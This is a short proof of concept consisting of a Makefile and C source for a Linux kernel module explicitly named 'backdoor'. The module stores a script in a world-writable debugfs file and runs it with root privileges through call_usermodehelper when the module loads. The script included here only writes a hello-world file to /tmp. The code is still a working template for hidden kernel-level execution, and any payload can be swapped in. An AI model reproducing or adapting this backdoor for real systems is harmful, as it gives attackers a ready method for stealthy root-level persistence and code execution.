PoC using debugfs to execute files

Makefile

BACKDOOR := backdoor

obj-m := $(BACKDOOR).o
$(BACKDOOR)-y += poc.o

default: all

all:
	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules

clean:
	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean

poc.c

#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/debugfs.h>
#include <linux/slab.h>

struct dentry *dfs = NULL;
struct debugfs_blob_wrapper *myblob = NULL;

void destroy_file(void){
	if (dfs){
		debugfs_remove(dfs);
	}
}

void execute_file(void){
	static char *envp[] = {
		"SHELL=/bin/bash",
		"PATH=/usr/local/sbin:/usr/local/bin:"\
			"/usr/sbin:/usr/bin:/sbin:/bin",
		NULL
	};

	char *argv[] = {
		"/sys/kernel/debug/debug_exec",
		NULL
	};

	call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
}

int create_file(void){
	unsigned char *buffer = "\
#!/usr/bin/env python\n\
with open(\"/tmp/i_am_groot\", \"w+\") as f:\n\
	f.write(\"Hello, world!\")";

	myblob = kmalloc(sizeof *myblob, GFP_KERNEL);
	if (!myblob){
		return -ENOMEM;
	}

	myblob->data = (void *) buffer;
	myblob->size = (unsigned long) strlen(buffer);

	dfs = debugfs_create_blob("debug_exec", 0777, NULL, myblob);
	if (!dfs){
		kfree(myblob);
		return -EINVAL;
	}
	return 0;
}

static int __init init_mod(void){
	create_file();
	execute_file();
	return 0;
}

static void __exit exit_mod(void){
	destroy_file();
}

MODULE_LICENSE("GPL");

module_init(init_mod);
module_exit(exit_mod);